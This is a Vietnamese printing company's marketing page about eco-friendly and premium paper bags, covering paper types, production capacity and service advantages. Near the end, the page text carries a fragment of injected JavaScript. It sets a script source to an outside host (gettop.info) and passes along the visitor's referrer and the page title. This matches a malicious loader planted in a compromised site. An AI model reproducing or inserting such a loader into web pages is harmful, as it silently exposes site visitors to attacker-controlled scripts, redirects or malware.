In ấn - thiết kế

Câu chuyện về túi giấy, người bán hàng thầm lặng

Câu chuyện về túi giấy, người bán hàng thầm lặng

Câu chuyện về túi giấy, người bán hàng thầm lặng

5 (100%) 1 vote

  1. Câu chuyện của Túi Giấy Môi Trường

Túi giấy môi trường cung cấp các loại túi giấy cho thị trường Việt Nam và Xuất khẩu vào các thị trường Châu âu và Nhật Bản. Chúng tôi mong muốn mang lại cho đối tác giải pháp tối ưu và bao bì túi giấy cho sản phẩm của mình, bao gồm giải pháp về quy trình sản xuất, chất liệu, chi phí và các dòng sản phẩm túi giấy phù hợp với từng mục đích sử dụng.

Mẫu túi giấy môi trường

Mẫu túi giấy môi trường

Mẫu túi giấy môi trường

Mẫu túi giấy môi trường

Với nguồn nhiên liệu giấy đảm bảo chất lượng, an toàn được nhập từ Nhật Bản, Indonesia, Hàn Quốc, cùng với phong cách thiết kế độc đáo, đơn giản và sáng tạo. Chúng tôi đảm bảo sẽ mang lại những mẫu túi đạt tiêu chuẩn độc đáo và sang trọng.

Hiện nay, chúng tôi đã đầu tư dòng máy dán túi hoàn toàn tự động với công suất 300.000 sản phẩm/ tháng đảm bảo đáp ứng mọi nhu cầu của khách hàng trong nước và xuất khẩu.

Túi giấy môi trường sản xuất đa dạng các dòng sản phẩm đáp ứng nhu cầu khách hàng, đa dạng hóa dòng sản phẩm túi giấy cao cấp đến túi giấy phổ thông, sử dụng các dòng giấy như Mỹ thuật, giấy Couche, giấy Ivory, giấy Kraft trắng, giấy Ivory kraft …Túi giấy của chúng tôi đã được hơn 100 nhãn hiệu thời trang trong nước chấp nhận và không ngừng phát triển.

2. In túi Giấy cao cấp

Túi giấy cao cấp được được xem là phần bao bì không thể thiếu đối với các sản phẩm thời trang danh tiếng. Rất nhiều nhãn hàng nổi tiếng đã bỏ ra nhiều chi phí để sản xuất các loại túi giấy cầu kỳ và tinh xảo, sử dụng các loại vật liệu cao cấp, gia công thành phẩm nhiều công đoạn như ép nhũ, dập nổi, cán vân, phủ UV định hình trên bề mặt túi. . . 

Mẫu in túi giấy cao cấp

Mẫu túi giấy cao cấp

Chất liệu giấy: In túi giấy cao cấp từ các loại giấy mỹ thuật, đây là yếu tố quan trọng để tạo nên sự khác biệt. Có thể sử dụng các loại giấy có bề mặt vân gỗ, vân ca rô, giấy ánh kim, các loại giấy có màu sắc đa dạng và đồng nhất. Hiện tại với nguồn giấy mỹ thuật dồi dào và đa dạng về mẫu mã giúp cho khách hàng có nhiều sự lựa chọn.

 

 

Tại sao phai in túi giấy?

In túi giấy có rất nhiều công dụng. Một chiếc túi giấy đẹp giúp bạn bán được nhiều hàng hơn, mang thương hiệu của bạn đi xa hơn. Hơn nữa logo của bạn được in lên chiếc túi giúp truyền thông tin tới người dùng.

Ưu điểm của in túi giấy tại công ty Tân Phương Nam:

  • In nhanh, giá rẻ, giao hàng tận nơi
  • Giấy in, mực in chất lượng
  • Tư vấn tận tình cho khách hàng

Ngoài ra, công ty chúng tôi còn nhiều dịch vụ in ấn :

Bảng giá in túi giấy cao cấp

}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Posted in: In túi giấy

Leave a Comment (0) ↓